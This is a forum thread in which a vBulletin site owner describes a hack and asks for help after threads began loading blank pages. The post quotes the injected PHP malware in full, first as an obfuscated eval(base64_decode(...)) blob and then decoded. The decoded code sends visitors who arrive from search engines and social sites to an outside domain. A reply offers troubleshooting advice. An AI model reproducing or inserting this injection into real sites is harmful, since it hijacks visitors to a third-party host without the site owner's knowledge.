Site major problems

ok my site has been having major problems pretty much around the time of the hack
i am running vbulletin , when a user clicks on a thread it goes to a blank page

i inspected the php files and found many to be ifected with base 64 code
of [i][quote]eval(base64_decode(“DQplcnJvcl9yZXBvcnRpbmcoMCk7DQokcWF6cGxtPWhlYWRlcnNfc2VudCgpOw0KaWYgKCEkcWF6cGxtKXsNCiRyZWZlcmVyPSRfU0VSVkVSWydIVFRQX1JFRkVSRVInXTsNCiR1YWc9JF9TRVJWRVJbJ0hUVFBfVVNFUl9BR0VOVCddOw0KaWYgKCR1YWcpIHsNCmlmIChzdHJpc3RyKCRyZWZlcmVyLCJ5YWhvbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJpbmciKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJyYW1ibGVyIikgb3Igc3RyaXN0cigkcmVmZXJlciwiZ29nbyIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImxpdmUuY29tIilvciBzdHJpc3RyKCRyZWZlcmVyLCJhcG9ydCIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsIm5pZ21hIikgb3Igc3RyaXN0cigkcmVmZXJlciwid2ViYWx0YSIpIG9yIHN0cmlzdHIoJHJlZmVyZXIsImJlZ3VuLnJ1Iikgb3Igc3RyaXN0cigkcmVmZXJlciwic3R1bWJsZXVwb24uY29tIikgb3Igc3RyaXN0cigkcmVmZXJlciwiYml0Lmx5Iikgb3Igc3RyaXN0cigkcmVmZXJlciwidGlueXVybC5jb20iKSBvciBwcmVnX21hdGNoKCIveWFuZGV4XC5ydVwveWFuZHNlYXJjaFw/KC4qPylcJmxyXD0vIiwkcmVmZXJlcikgb3IgcHJlZ19tYXRjaCAoIi9nb29nbGVcLiguKj8pXC91cmwvIiwkcmVmZXJlcikgb3Igc3RyaXN0cigkcmVmZXJlciwibXlzcGFjZS5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJmYWNlYm9vay5jb20iKSBvciBzdHJpc3RyKCRyZWZlcmVyLCJhb2wuY29tIikpIHsNCmlmICghc3RyaXN0cigkcmVmZXJlciwiY2FjaGUiKSBvciAhc3RyaXN0cigkcmVmZXJlciwiaW51cmwiKSl7DQpoZWFkZXIoIkxvY2F0aW9uOiBodHRwOi8vY29udGVudG8uYmVlLnBsLyIpOw0KZXhpdCgpOw0KfQ0KfQ0KfQ0KfQ==”));[/quote]

which converts to

[quote]rror_reporting(0);
$qazplm=headers_sent();
if (!$qazplm){
$referer=$_SERVER[‘HTTP_REFERER’];
$uag=$_SERVER[‘HTTP_USER_AGENT’];
if ($uag) {
if (stristr($referer,“yahoo”) or stristr($referer,“bing”) or stristr($referer,“rambler”) or stristr($referer,“gogo”) or stristr($referer,“live.com”)or stristr($referer,“aport”) or stristr($referer,“nigma”) or stristr($referer,“webalta”) or stristr($referer,“begun.ru”) or stristr($referer,“stumbleupon.com”) or stristr($referer,“bit.ly”) or stristr($referer,“tinyurl.com”) or preg_match("/yandex.ru/yandsearch?(.?)&lr=/",$referer) or preg_match ("/google.(.?)/url/",$referer) or stristr($referer,“myspace.com”) or stristr($referer,“facebook.com”) or stristr($referer,“aol.com”)) {
if (!stristr($referer,“cache”) or !stristr($referer,“inurl”)){
header(“Location: http://contento.bee.pl/”);
exit();[/quote]
with the time tags of 1/20/2012 6:48pm

after clearing the files , my site is still off air , that didn’t fix the problem so reinstalled all files still no go

sent an email and got the normal canned response of how to deal with a hacked site

i rolled back my sql database to two days ago before the hack took place

before news of the hack was released i had upgraded my vps to a dedicated, my old vps was psmysql73952 and my new dedicated is ds2822 , however my sql files still lay on the psmysql73952 server

[/i]

So what’s the problem now? If you cleared all the files with that code, what are the symptoms? if they are being redirected, then there’s still code you haven’t found. If they aren’t, then there’s something messed up with your app or its installation/config

[quote]ok my site has been having major problems pretty much around the time of the hack
i am running vbulletin , when a user clicks on a thread it goes to a blank page[/quote]